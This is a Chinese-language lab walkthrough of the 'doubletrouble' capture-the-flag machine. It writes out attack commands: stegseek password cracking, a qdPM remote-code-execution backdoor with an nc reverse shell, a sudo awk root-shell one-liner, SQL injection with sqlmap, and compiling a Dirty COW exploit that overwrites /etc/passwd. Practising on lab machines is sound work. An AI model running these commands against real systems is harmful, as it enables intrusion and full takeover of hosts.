1.常规端口及服务发现
2.发现qdPM这一web应用以及一个链接
3.关键文件/core和/install均没有删除,遍历文件发现并没有得到有效信息
4.searchsploit qdpm 9.1 发现存在rce漏洞需要登录使用,使用默认密码进行登录,但
是失败,开始进行常规路径爬取
5.发现secret路径,对里面的图片进行隐写读取
首先使用steghide进行探测steghide info doubletrouble.jpg
读取信息,但是需要密码,进行隐写密码爆破
StegSeek高效的密码爆破工具
stegseek --crack doubletrouble.jpg rockyou.txt 破解密码成功
再加上-xf参数得到文件file
file查看文件属性并且查看得到账号密码,成功登录进入后台
开始使用rce漏洞进行爆破,但是
文件缩进存在问题,进行缩进调试
执行成功上传了一个后门文件,使用nc反弹shell成功,升级shell后
突破外围打点完成
6.sudo -l发现awk存在root权限,使用命令进行提权
sudo awk ‘BEGIN {system(“/bin/bash”)}’
提权成功拿下root权限,进入到root目录发现还有一个靶机
nc -nvlp 4444> second.ova
nc 10.0.2.15 4444 <doubletrouble.ova -w 1
7.md5sum查看两个文件的哈希值是相同,没有损坏,进行导入
8.再次进行常规端口服务侦探
先进行万能密码测试 ’ or 1=1#失败,查看源码也没有收获,再次进行路径爬取
但是也没有得到有效的信息,使用bp抓包放回包,使用时间盲注得到不一样的注入
将数据包保存下来,使用sqlmap进行注入成功,使用得到的账号密码均失败
9.使用ssh进行登录目标系统账号密码,尝试用第二个账号密码登录ssh时发现成功,
突破外围打点完成
查看内核版本,uname -a查看内核版本为3.2.0思考到可以使用脏牛内核漏洞进行提权
用nc将脏牛的exp传到目标机器上
cd /tmp
nc -nvlp 4444>exp.c
nc 10.0.2.40 4444 < dirtycow.c -w 1
gcc -pthread exp.c -0 exp -lcrypt -pthread 会附加一个宏定义 -D_REENTRANT 该宏会导致libc头文件选择那些thread-safe的实现
chmod +x exp
./exp pass
ssh firefart@10.0.2.40
cp /tmp/passwd.wak /etc/passwd
passwd
exit
ssh root@10.0.2.40
10.成功登录进靶机,拿下目标主机root权限,ls+cat查看到flag